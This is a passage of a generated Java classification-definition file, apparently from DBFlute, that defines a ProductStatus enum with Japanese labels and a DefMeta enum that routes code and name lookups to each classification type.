throw new ClassificationNotFoundException("Unknown classification group: MemberStatus." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<MemberStatus> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<MemberStatus> clsList = new ArrayList<MemberStatus>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<MemberStatus> groupOf(String groupName) {
return new ArrayList<MemberStatus>(4);
}
@Override public String toString() { return code(); }
}
/**
* 商品ステータス: 商品の状態を示す
*/
public enum ProductStatus implements CDef {
/** 生産販売可能 */
OnSale("ONS", "生産販売可能", emptyStrings())
,
/** 生産中止 */
ProductStop("PST", "生産中止", emptyStrings())
,
/** 販売中止 */
SaleStop("SST", "販売中止", emptyStrings())
;
private static final Map<String, ProductStatus> _codeClsMap = new HashMap<String, ProductStatus>();
private static final Map<String, ProductStatus> _nameClsMap = new HashMap<String, ProductStatus>();
static {
for (ProductStatus value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private ProductStatus(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.ProductStatus; }
public boolean inGroup(String groupName) {
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<ProductStatus> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof ProductStatus) { return OptionalThing.of((ProductStatus)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<ProductStatus> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static ProductStatus codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof ProductStatus) { return (ProductStatus)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static ProductStatus nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<ProductStatus> listAll() {
return new ArrayList<ProductStatus>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<ProductStatus> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
throw new ClassificationNotFoundException("Unknown classification group: ProductStatus." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<ProductStatus> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<ProductStatus> clsList = new ArrayList<ProductStatus>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<ProductStatus> groupOf(String groupName) {
return new ArrayList<ProductStatus>(4);
}
@Override public String toString() { return code(); }
}
public enum DefMeta implements ClassificationMeta {
/** 会員が受けられるサービスのランクを示す */
ServiceRank
,
/** mainly region of member address */
Region
,
/** reason for member withdrawal */
WithdrawalReason
,
/** 支払方法 */
PaymentMethod
,
/** the test of reference variable in grouping map */
GroupingReference
,
/** The test of relation reference */
SelfReference
,
/** The test of top only */
TopCommentOnly
,
/** the test of sub-item map for implicit classification */
SubItemImplicit
,
/** the test of sub-item map for table classification */
SubItemTable
,
/** boolean classification for boolean column */
BooleanFlg
,
/** master type of variant relation (biz-many-to-one) */
VariantRelationMasterType
,
/** qux type of variant relation (biz-many-to-one) */
VariantRelationQuxType
,
/** merged */
QuxCls
,
/** delimiter; & endBrace} & path\foo\bar */
EscapedDfpropCls
,
/** /*IF pmb.yourTop*/><& */
EscapedJavaDocCls
,
/** 6 */
EscapedNumberInitialCls
,
/** top first line top second line top third line */
LineSepCommentCls
,
/** no camelizing classification */
NamingDefaultCamelizingType
,
/** no camelizing classification */
NamingNoCamelizingType
,
/** is deprecated classification */
DeprecatedTopBasicType
,
/** has deprecated element */
DeprecatedMapBasicType
,
/** has deprecated element */
DeprecatedMapCollaborationType
,
/** unique key as classification */
UQClassificationType
,
/** Classification of Bar */
BarCls
,
/** Classification of Foo */
FooCls
,
/** フラグを示す */
Flg
,
/** 会員ステータス: 会員の状態を示す */
MemberStatus
,
/** 商品ステータス: 商品の状態を示す */
ProductStatus
;
public String classificationName() {
return name(); // same as definition name
}
public OptionalThing<? extends Classification> of(Object code) {
if (ServiceRank.name().equals(name())) { return CDef.ServiceRank.of(code); }
if (Region.name().equals(name())) { return CDef.Region.of(code); }
if (WithdrawalReason.name().equals(name())) { return CDef.WithdrawalReason.of(code); }
if (PaymentMethod.name().equals(name())) { return CDef.PaymentMethod.of(code); }
if (GroupingReference.name().equals(name())) { return CDef.GroupingReference.of(code); }
if (SelfReference.name().equals(name())) { return CDef.SelfReference.of(code); }
if (TopCommentOnly.name().equals(name())) { return CDef.TopCommentOnly.of(code); }
if (SubItemImplicit.name().equals(name())) { return CDef.SubItemImplicit.of(code); }
if (SubItemTable.name().equals(name())) { return CDef.SubItemTable.of(code); }
if (BooleanFlg.name().equals(name())) { return CDef.BooleanFlg.of(code); }
if (VariantRelationMasterType.name().equals(name())) { return CDef.VariantRelationMasterType.of(code); }
if (VariantRelationQuxType.name().equals(name())) { return CDef.VariantRelationQuxType.of(code); }
if (QuxCls.name().equals(name())) { return CDef.QuxCls.of(code); }
if (EscapedDfpropCls.name().equals(name())) { return CDef.EscapedDfpropCls.of(code); }
if (EscapedJavaDocCls.name().equals(name())) { return CDef.EscapedJavaDocCls.of(code); }
if (EscapedNumberInitialCls.name().equals(name())) { return CDef.EscapedNumberInitialCls.of(code); }
if (LineSepCommentCls.name().equals(name())) { return CDef.LineSepCommentCls.of(code); }
if (NamingDefaultCamelizingType.name().equals(name())) { return CDef.NamingDefaultCamelizingType.of(code); }
if (NamingNoCamelizingType.name().equals(name())) { return CDef.NamingNoCamelizingType.of(code); }
if (DeprecatedTopBasicType.name().equals(name())) { return CDef.DeprecatedTopBasicType.of(code); }
if (DeprecatedMapBasicType.name().equals(name())) { return CDef.DeprecatedMapBasicType.of(code); }
if (DeprecatedMapCollaborationType.name().equals(name())) { return CDef.DeprecatedMapCollaborationType.of(code); }
if (UQClassificationType.name().equals(name())) { return CDef.UQClassificationType.of(code); }
if (BarCls.name().equals(name())) { return CDef.BarCls.of(code); }
if (FooCls.name().equals(name())) { return CDef.FooCls.of(code); }
if (Flg.name().equals(name())) { return CDef.Flg.of(code); }
if (MemberStatus.name().equals(name())) { return CDef.MemberStatus.of(code); }
if (ProductStatus.name().equals(name())) { return CDef.ProductStatus.of(code); }
throw new IllegalStateException("Unknown definition: " + this); // basically unreachable
}
public OptionalThing<? extends Classification> byName(String name) {
if (ServiceRank.name().equals(name())) { return CDef.ServiceRank.byName(name); }
if (Region.name().equals(name())) { return CDef.Region.byName(name); }
if (WithdrawalReason.name().equals(name())) { return CDef.WithdrawalReason.byName(name); }
if (PaymentMethod.name().equals(name())) { return CDef.PaymentMethod.byName(name); }
if (GroupingReference.name().equals(name())) { return CDef.GroupingReference.byName(name); }
if (SelfReference.name().equals(name())) { return CDef.SelfReference.byName(name); }
if (TopCommentOnly.name().equals(name())) { return CDef.TopCommentOnly.byName(name); }
if (SubItemImplicit.name().equals(name())) { return CDef.SubItemImplicit.byName(name); }
if (SubItemTable.name().equals(name())) { return CDef.SubItemTable.byName(name); }
if (BooleanFlg.name().equals(name())) { return CDef.BooleanFlg.byName(name); }
if (VariantRelationMasterType.name().equals(name())) { return CDef.VariantRelationMasterType.byName(name); }
if (VariantRelationQuxType.name().equals(name())) { return CDef.VariantRelationQuxType.byName(name); }
if (QuxCls.name().equals(name())) { return CDef.QuxCls.byName(name); }
if (EscapedDfpropCls.name().equals(name())) { return CDef.EscapedDfpropCls.byName(name); }
if (EscapedJavaDocCls.name().equals(name())) { return CDef.EscapedJavaDocCls.byName(name); }
if (EscapedNumberInitialCls.name().equals(name())) { return CDef.EscapedNumberInitialCls.byName(name); }
if (LineSepCommentCls.name().equals(name())) { return CDef.LineSepCommentCls.byName(name); }
if (NamingDefaultCamelizingType.name().equals(name())) { return CDef.NamingDefaultCamelizingType.byName(name); }
if (NamingNoCamelizingType.name().equals(name())) { return CDef.NamingNoCamelizingType.byName(name); }
if (DeprecatedTopBasicType.name().equals(name())) { return CDef.DeprecatedTopBasicType.byName(name); }
if (DeprecatedMapBasicType.name().equals(name())) { return CDef.DeprecatedMapBasicType.byName(name); }
if (DeprecatedMapCollaborationType.name().equals(name())) { return CDef.DeprecatedMapCollaborationType.byName(name); }
if (UQClassificationType.name().equals(name())) { return CDef.UQClassificationType.byName(name); }
if (BarCls.name().equals(name())) { return CDef.BarCls.byName(name); }
if (FooCls.name().equals(name())) { return CDef.FooCls.byName(name); }
if (Flg.name().equals(name())) { return CDef.Flg.byName(name); }
if (MemberStatus.name().equals(name())) { return CDef.MemberStatus.byName(name); }
if (ProductStatus.name().equals(name())) { return CDef.ProductStatus.byName(name); }
throw new IllegalStateException("Unknown definition: " + this); // basically unreachable
}
public Classification codeOf(Object code) { // null if not found, old style so use of(code)
if (ServiceRank.name().equals(name())) { return CDef.ServiceRank.codeOf(code); }
if (Region.name().equals(name())) { return CDef.Region.codeOf(code); }
if (WithdrawalReason.name().equals(name())) { return CDef.WithdrawalReason.codeOf(code); }
if (PaymentMethod.name().equals(name())) { return CDef.PaymentMethod.codeOf(code); }
if (GroupingReference.name().equals(name())) { return CDef.GroupingReference.codeOf(code); }
if (SelfReference.name().equals(name())) { return CDef.SelfReference.codeOf(code); }
if (TopCommentOnly.name().equals(name())) { return CDef.TopCommentOnly.codeOf(code); }
if (SubItemImplicit.name().equals(name())) { return CDef.SubItemImplicit.codeOf(code); }
if (SubItemTable.name().equals(name())) { return CDef.SubItemTable.codeOf(code); }
if (BooleanFlg.name().equals(name())) { return CDef.BooleanFlg.codeOf(code); }
if (VariantRelationMasterType.name().equals(name())) { return CDef.VariantRelationMasterType.codeOf(code); }
if (VariantRelationQuxType.name().equals(name())) { return CDef.VariantRelationQuxType.codeOf(code); }
if (QuxCls.name().equals(name())) { return CDef.QuxCls.codeOf(code); }
if (EscapedDfpropCls.name().equals(name())) { return CDef.EscapedDfpropCls.codeOf(code); }
if (EscapedJavaDocCls.name().equals(name())) { return CDef.EscapedJavaDocCls.codeOf(code); }
if (EscapedNumberInitialCls.name().equals(name())) { return CDef.EscapedNumberInitialCls.codeOf(code); }
if (LineSepCommentCls.name().equals(name())) { return CDef.LineSepCommentCls.codeOf(code); }
if (NamingDefaultCamelizingType.name().equals(name())) { return CDef.NamingDefaultCamelizingType.codeOf(code); }
if (NamingNoCamelizingType.name().equals(name())) { return CDef.NamingNoCamelizingType.codeOf(code); }
if (DeprecatedTopBasicType.name().equals(name())) { return CDef.DeprecatedTopBasicType.codeOf(code); }
if (DeprecatedMapBasicType.name().equals(name())) { return CDef.DeprecatedMapBasicType.codeOf(code); }
if (DeprecatedMapCollaborationType.name().equals(name())) { return CDef.DeprecatedMapCollaborationType.codeOf(code); }
if (UQClassificationType.name().equals(name())) { return CDef.UQClassificationType.codeOf(code); }
if (BarCls.name().equals(name())) { return CDef.BarCls.codeOf(code); }
if (FooCls.name().equals(name())) { return CDef.FooCls.codeOf(code); }
if (Flg.name().equals(name())) { return CDef.Flg.codeOf(code); }
if (MemberStatus.name().equals(name())) { return CDef.MemberStatus.codeOf(code); }
if (ProductStatus.name().equals(name())) { return CDef.ProductStatus.codeOf(code); }
throw new IllegalStateException("Unknown definition: " + this); // basically unreachable
}
public Classification nameOf(String name) { // null if not found, old style so use byName(name)
if (ServiceRank.name().equals(name())) { return CDef.ServiceRank.valueOf(name); }
if (Region.name().equals(name())) { return CDef.Region.valueOf(name); }
if (WithdrawalReason.name().equals(name())) { return CDef.WithdrawalReason.valueOf(name); }
if (PaymentMethod.name().equals(name())) { return CDef.PaymentMethod.valueOf(name); }
if (GroupingReference.name().equals(name())) { return CDef.GroupingReference.valueOf(name); }
if (SelfReference.name().equals(name())) { return CDef.SelfReference.valueOf(name); }
if (TopCommentOnly.name().equals(name())) { return CDef.TopCommentOnly.valueOf(name); }
if (SubItemImplicit.name().equals(name())) { return CDef.SubItemImplicit.valueOf(name); }
if (SubItemTable.name().equals(name())) { return CDef.SubItemTable.valueOf(name); }
if (BooleanFlg.name().equals(name())) { return CDef.BooleanFlg.valueOf(name); }
if (VariantRelationMasterType.name().equals(name())) { return CDef.VariantRelationMasterType.valueOf(name); }
if (VariantRelationQuxType.name().equals(name())) { return CDef.VariantRelationQuxType.valueOf(name); }
if (QuxCls.name().equals(name())) { return CDef.QuxCls.valueOf(name); }
if (EscapedDfpropCls.name().equals(name())) { return CDef.EscapedDfpropCls.valueOf(name); }
if (EscapedJavaDocCls.name().equals(name())) { return CDef.EscapedJavaDocCls.valueOf(name); }
if (EscapedNumberInitialCls.name().equals(name())) { return CDef.EscapedNumberInitialCls.valueOf(name); }
if (LineSepCommentCls.name().equals(name())) { return CDef.LineSepCommentCls.valueOf(name); }
if (NamingDefaultCamelizingType.name().equals(name())) { return CDef.NamingDefaultCamelizingType.valueOf(name); }
if (NamingNoCamelizingType.name().equals(name())) { return CDef.NamingNoCamelizingType.valueOf(name); }
if (DeprecatedTopBasicType.name().equals(name())) { return CDef.DeprecatedTopBasicType.valueOf(name); }
if (DeprecatedMapBasicType.name().equals(name())) { return CDef.DeprecatedMapBasicType.valueOf(name); }
if (DeprecatedMapCollaborationType.name().equals(name())) { return CDef.DeprecatedMapCollaborationType.valueOf(name); }
if (UQClassificationType.name().equals(name())) { return CDef.UQClassificationType.valueOf(name); }
if (BarCls.name().equals(name())) { return CDef.BarCls.valueOf(name); }
if (FooCls.name().equals(name())) { return CDef.FooCls.valueOf(name); }
if (Flg.name().equals(name())) { return CDef.Flg.valueOf(name); }
if (MemberStatus.name().equals(name())) { return CDef.MemberStatus.valueOf(name); }
if (ProductStatus.name().equals(name())) { return CDef.ProductStatus.valueOf(name); }
throw new IllegalStateException("Unknown definition: " + this); // basically unreachable
}
public List<Classification> listAll() {
if (ServiceRank.name().equals(name())) { return toClsList(CDef.ServiceRank.listAll()); }
if (Region.name().equals(name())) { return toClsList(CDef.Region.listAll()); }
if (WithdrawalReason.name().equals(name())) { return toClsList(CDef.WithdrawalReason.listAll()); }
if (PaymentMethod.name().equals(name())) { return toClsList(CDef.PaymentMethod.listAll()); }
if (GroupingReference.name().equals(name())) { return toClsList(CDef.GroupingReference.listAll()); }
if (SelfReference.name().equals(name())) { return toClsList(CDef.SelfReference.listAll()); }
if (TopCommentOnly.name().equals(name())) { return toClsList(CDef.TopCommentOnly.listAll()); }
if (SubItemImplicit.name().equals(name())) { return toClsList(CDef.SubItemImplicit.listAll()); }
if (SubItemTable.name().equals(name())) { return toClsList(CDef.SubItemTable.listAll()); }
if (BooleanFlg.name().equals(name())) { return toClsList(CDef.BooleanFlg.listAll()); }
if (VariantRelationMasterType.name().equals(name())) { return toClsList(CDef.VariantRelationMasterType.listAll()); }
if (VariantRelationQuxType.name().equals(name())) { return toClsList(CDef.VariantRelationQuxType.listAll()); }
if (QuxCls.name().equals(name())) { return toClsList(CDef.QuxCls.listAll()); }
if (EscapedDfpropCls.name().equals(name())) { return toClsList(CDef.EscapedDfpropCls.listAll()); }
if (EscapedJavaDocCls.name().equals(name())) { return toClsList(CDef.EscapedJavaDocCls.listAll()); }
if (EscapedNumberInitialCls.name().equals(name())) { return toClsList(CDef.EscapedNumberInitialCls.listAll()); }
if (LineSepCommentCls.name().equals(name())) { return toClsList(CDef.LineSepCommentCls.listAll()); }
if (NamingDefaultCamelizingType.name().equals(name())) { return toClsList(CDef.NamingDefaultCamelizingType.listAll()); }
if (NamingNoCamelizingType.name().equals(name())) { return toClsList(CDef.NamingNoCamelizingType.listAll()); }
if (DeprecatedTopBasicType.name().equals(name())) { return toClsList(CDef.DeprecatedTopBasicType.listAll()); }
if (DeprecatedMapBasicType.name().equals(name())) { return toClsList(CDef.DeprecatedMapBasicType.listAll()); }
if (DeprecatedMapCollaborationType.name().equals(name())) { return toClsList(CDef.DeprecatedMapCollaborationType.listAll()); }
if (UQClassificationType.name().equals(name())) { return toClsList(CDef.UQClassificationType.listAll()); }
if (BarCls.name().equals(name())) { return toClsList(CDef.BarCls.listAll()); }
if (FooCls.name().equals(name())) { return toClsList(CDef.FooCls.listAll()); }
if (Flg.name().equals(name())) { return toClsList(CDef.Flg.listAll()); }
if (MemberStatus.name().equals(name())) { return toClsList(CDef.MemberStatus.listAll()); }
if (ProductStatus.name().equals(name())) { return toClsList(CDef.ProductStatus.listAll()); }
throw new IllegalStateException("Unknown definition: " + this); // basically unreachable
}
public List<Classification> listByGroup(String groupName) { // exception if not found
if (ServiceRank.name().equals(name())) { return toClsList(CDef.ServiceRank.listByGroup(groupName)); }
if (Region.name().equals(name())) { return toClsList(CDef.Region.listByGroup(groupName)); }
if (WithdrawalReason.name().equals(name())) { return toClsList(CDef.WithdrawalReason.listByGroup(groupName)); }
if (PaymentMethod.name().equals(name())) { return toClsList(CDef.PaymentMethod.listByGroup(groupName)); }
if (GroupingReference.name().equals(name())) { return toClsList(CDef.GroupingReference.listByGroup(groupName)); }
if (SelfReference.name().equals(name())) { return toClsList(CDef.SelfReference.listByGroup(groupName)); }
if (TopCommentOnly.name().equals(name())) { return toClsList(CDef.TopCommentOnly.listByGroup(groupName)); }
if (SubItemImplicit.name().equals(name())) { return toClsList(CDef.SubItemImplicit.listByGroup(groupName)); }
if (SubItemTable.name().equals(name())) { return toClsList(CDef.SubItemTable.listByGroup(groupName)); }
if (BooleanFlg.name().equals(name())) { return toClsList(CDef.BooleanFlg.listByGroup(groupName)); }
if (VariantRelationMasterType.name().equals(name())) { return toClsList(CDef.VariantRelationMasterType.listByGroup(groupName)); }
if (VariantRelationQuxType.name().equals(name())) { return toClsList(CDef.VariantRelationQuxType.listByGroup(groupName)); }
if (QuxCls.name().equals(name())) { return toClsList(CDef.QuxCls.listByGroup(groupName)); }
if (EscapedDfpropCls.name().equals(name())) { return toClsList(CDef.EscapedDfpropCls.listByGroup(groupName)); }
if (EscapedJavaDocCls.name().equals(name())) { return toClsList(CDef.EscapedJavaDocCls.listByGroup(groupName)); }
if (EscapedNumberInitialCls.name().equals(name())) { return toClsList(CDef.EscapedNumberInitialCls.listByGroup(groupName)); }
if (LineSepCommentCls.name().equals(name())) { return toClsList(CDef.LineSepCommentCls.listByGroup(groupName)); }
if (NamingDefaultCamelizingType.name().equals(name())) { return toClsList(CDef.NamingDefaultCamelizingType.listByGroup(groupName)); }
if (NamingNoCamelizingType.name().equals(name())) { return toClsList(CDef.NamingNoCamelizingType.listByGroup(groupName)); }
if (DeprecatedTopBasicType.name().equals(name())) { return toClsList(CDef.DeprecatedTopBasicType.listByGroup(groupName)); }
if (DeprecatedMapBasicType.name().equals(name())) { return toClsList(CDef.DeprecatedMapBasicType.listByGroup(groupName)); }
if (DeprecatedMapCollaborationType.name().equals(name())) { return toClsList(CDef.DeprecatedMapCollaborationType.listByGroup(groupName)); }
if (UQClassificationType.name().equals(name())) { return toClsList(CDef.UQClassificationType.listByGroup(groupName)); }
if (BarCls.name().equals(name())) { return toClsList(CDef.BarCls.listByGroup(groupName)); }
if (FooCls.name().equals(name())) { return toClsList(CDef.FooCls.listByGroup(groupName)); }
if (Flg.name().equals(name())) { return toClsList(CDef.Flg.listByGroup(groupName)); }
if (MemberStatus.name().equals(name())) { return toClsList(CDef.MemberStatus.listByGroup(groupName)); }
if (ProductStatus.name().equals(name())) { return toClsList(CDef.ProductStatus.listByGroup(groupName)); }
throw new IllegalStateException("Unknown definition: " + this); // basically unreachable
}
public List<Classification> listOf(Collection<String> codeList) {
if (ServiceRank.name().equals(name())) { return toClsList(CDef.ServiceRank.listOf(codeList)); }
if (Region.name().equals(name())) { return toClsList(CDef.Region.listOf(codeList)); }
if (WithdrawalReason.name().equals(name())) { return toClsList(CDef.WithdrawalReason.listOf(codeList)); }
if (PaymentMethod.name().equals(name())) { return toClsList(CDef.PaymentMethod.listOf(codeList)); }
if (GroupingReference.name().equals(name())) { return toClsList(CDef.GroupingReference.listOf(codeList)); }
if (SelfReference.name().equals(name())) { return toClsList(CDef.SelfReference.listOf(codeList)); }
if (TopCommentOnly.name().equals(name())) { return toClsList(CDef.TopCommentOnly.listOf(codeList)); }
if (SubItemImplicit.name().equals(name())) { return toClsList(CDef.SubItemImplicit.listOf(codeList)); }
if (SubItemTable.name().equals(name())) { return toClsList(CDef.SubItemTable.listOf(codeList)); }
if (BooleanFlg.name().equals(name())) { return toClsList(CDef.BooleanFlg.listOf(codeList)); }
if (VariantRelationMasterType.name().equals(name())) { return toClsList(CDef.VariantRelationMasterType.listOf(codeList)); }
if (VariantRelationQuxType.name().equals(name())) { return toClsList(CDef.VariantRelationQuxType.listOf(codeList)); }
if (QuxCls.name().equals(name())) { return toClsList(CDef.QuxCls.listOf(codeList)); }
if (EscapedDfpropCls.name().equals(name())) { return toClsList(CDef.EscapedDfpropCls.listOf(codeList)); }
if (EscapedJavaDocCls.name().equals(name())) { return toClsList(CDef.EscapedJavaDocCls.listOf(codeList)); }
if (EscapedNumberInitialCls.name().equals(name())) { return toClsList(CDef.EscapedNumberInitialCls.listOf(codeList)); }
if (LineSepCommentCls.name().equals(name())) { return toClsList(CDef.LineSepCommentCls.listOf(codeList)); }
if (NamingDefaultCamelizingType.name().equals(name())) { return toClsList(CDef.NamingDefaultCamelizingType.listOf(codeList)); }
if (NamingNoCamelizingType.name().equals(name())) { return toClsList(CDef.NamingNoCamelizingType.listOf(codeList)); }
if (DeprecatedTopBasicType.name().equals(name())) { return toClsList(CDef.DeprecatedTopBasicType.listOf(codeList)); }
if (DeprecatedMapBasicType.name().equals(name())) { return toClsList(CDef.DeprecatedMapBasicType.listOf(codeList)); }
if (DeprecatedMapCollaborationType.name().equals(name())) { return toClsList(CDef.DeprecatedMapCollaborationType.listOf(codeList)); }
if (UQClassificationType.name().equals(name())) { return toClsList(CDef.UQClassificationType.listOf(codeList)); }
if (BarCls.name().equals(name())) { return toClsList(CDef.BarCls.listOf(codeList)); }
if (FooCls.name().equals(name())) { return toClsList(CDef.FooCls.listOf(codeList)); }
if (Flg.name().equals(name())) { return toClsList(CDef.Flg.listOf(codeList)); }
if (MemberStatus.name().equals(name())) { return toClsList(CDef.MemberStatus.listOf(codeList)); }
if (ProductStatus.name().equals(name())) { return toClsList(CDef.ProductStatus.listOf(codeList)); }
throw new IllegalStateException("Unknown definition: " + this); // basically unreachable
}
public List<Classification> groupOf(String groupName) { // old style
if (ServiceRank.name().equals(name())) { return toClsList(CDef.ServiceRank.groupOf(groupName)); }
if (Region.name().equals(name())) { return toClsList(CDef.Region.groupOf(groupName)); }
if (WithdrawalReason.name().equals(name())) { return toClsList(CDef.WithdrawalReason.groupOf(groupName)); }
if (PaymentMethod.name().equals(name())) { return toClsList(CDef.PaymentMethod.groupOf(groupName)); }
if (GroupingReference.name().equals(name())) { return toClsList(CDef.GroupingReference.groupOf(groupName)); }
if (SelfReference.name().equals(name())) { return toClsList(CDef.SelfReference.groupOf(groupName)); }
if (TopCommentOnly.name().equals(name())) { return toClsList(CDef.TopCommentOnly.groupOf(groupName)); }
if (SubItemImplicit.name().equals(name())) { return toClsList(CDef.SubItemImplicit.groupOf(groupName)); }
if (SubItemTable.name().equals(name())) { return toClsList(CDef.SubItemTable.groupOf(groupName)); }
if (BooleanFlg.name().equals(name())) { return toClsList(CDef.BooleanFlg.groupOf(groupName)); }
if (VariantRelationMasterType.name().equals(name())) { return toClsList(CDef.VariantRelationMasterType.groupOf(groupName)); }
if (VariantRelationQuxType.name().equals(name())) { return toClsList(CDef.VariantRelationQuxType.groupOf(groupName)); }
if (QuxCls.name().equals(name())) { return toClsList(CDef.QuxCls.groupOf(groupName)); }
if (EscapedDfpropCls.name().equals(name())) { return toClsList(CDef.EscapedDfpropCls.groupOf(groupName)); }
if (EscapedJavaDocCls.name().equals(name())) { return toClsList(CDef.EscapedJavaDocCls.groupOf(groupName)); }
if (EscapedNumberInitialCls.name().equals(name())) { return toClsList(CDef.EscapedNumberInitialCls.groupOf(groupName)); }
if (LineSepCommentCls.name().equals(name())) { return toClsList(CDef.LineSepCommentCls.groupOf(groupName)); }
if (NamingDefaultCamelizingType.name().equals(name())) { return toClsList(CDef.NamingDefaultCamelizingType.groupOf(groupName)); }
if (NamingNoCamelizingType.name().equals(name())) { return toClsList(CDef.NamingNoCamelizingType.groupOf(groupName)); }
if (DeprecatedTopBasicType.name().equals(name())) { return toClsList(CDef.DeprecatedTopBasicType.groupOf(groupName)); }
if (DeprecatedMapBasicType.name().equals(name())) { return toClsList(CDef.DeprecatedMapBasicType.groupOf(groupName)); }
if (DeprecatedMapCollaborationType.name().equals(name())) { return toClsList(CDef.DeprecatedMapCollaborationType.groupOf(groupName)); }
if (UQClassificationType.name().equals(name())) { return toClsList(CDef.UQClassificationType.groupOf(groupName)); }
if (BarCls.name().equals(name())) { return toClsList(CDef.BarCls.groupOf(groupName)); }
if (FooCls.name().equals(name())) { return toClsList(CDef.FooCls.groupOf(groupName)); }
if (Flg.name().equals(name())) { return toClsList(CDef.Flg.groupOf(groupName)); }
if (MemberStatus.name().equals(name())) { return toClsList(CDef.MemberStatus.groupOf(groupName)); }
if (ProductStatus.name().equals(name())) { return toClsList(CDef.ProductStatus.groupOf(groupName)); }
throw new IllegalStateException("Unknown definition: " + this); // basically unreachable
}
@SuppressWarnings("unchecked")
private List<Classification> toClsList(List<?> clsList) {
return (List<Classification>)clsList;
}
public ClassificationCodeType codeType() {
if (ServiceRank.name().equals(name())) { return ClassificationCodeType.String; }
if (Region.name().equals(name())) { return ClassificationCodeType.Number; }
if (WithdrawalReason.name().equals(name())) { return ClassificationCodeType.String; }
if (PaymentMethod.name().equals(name())) { return ClassificationCodeType.String; }
if (GroupingReference.name().equals(name())) { return ClassificationCodeType.String; }
if (SelfReference.name().equals(name())) { return ClassificationCodeType.Number; }
if (TopCommentOnly.name().equals(name())) { return ClassificationCodeType.String; }
if (SubItemImplicit.name().equals(name())) { return ClassificationCodeType.Number; }
if (SubItemTable.name().equals(name())) { return ClassificationCodeType.String; }
if (BooleanFlg.name().equals(name())) { return ClassificationCodeType.Boolean; }
if (VariantRelationMasterType.name().equals(name())) { return ClassificationCodeType.String; }
if (VariantRelationQuxType.name().equals(name())) { return ClassificationCodeType.String; }
if (QuxCls.name().equals(name())) { return ClassificationCodeType.String; }
if (EscapedDfpropCls.name().equals(name())) { return ClassificationCodeType.String; }
if (EscapedJavaDocCls.name().equals(name())) { return ClassificationCodeType.String; }
if (EscapedNumberInitialCls.name().equals(name())) { return ClassificationCodeType.String; }
if (LineSepCommentCls.name().equals(name())) { return ClassificationCodeType.String; }
if (NamingDefaultCamelizingType.name().equals(name())) { return ClassificationCodeType.String; }
if (NamingNoCamelizingType.name().equals(name())) { return ClassificationCodeType.String; }
if (DeprecatedTopBasicType.name().equals(name())) { return ClassificationCodeType.String; }
if (DeprecatedMapBasicType.name().equals(name())) { return ClassificationCodeType.String; }
if (DeprecatedMapCollaborationType.name().equals(name())) { return ClassificationCodeType.String; }
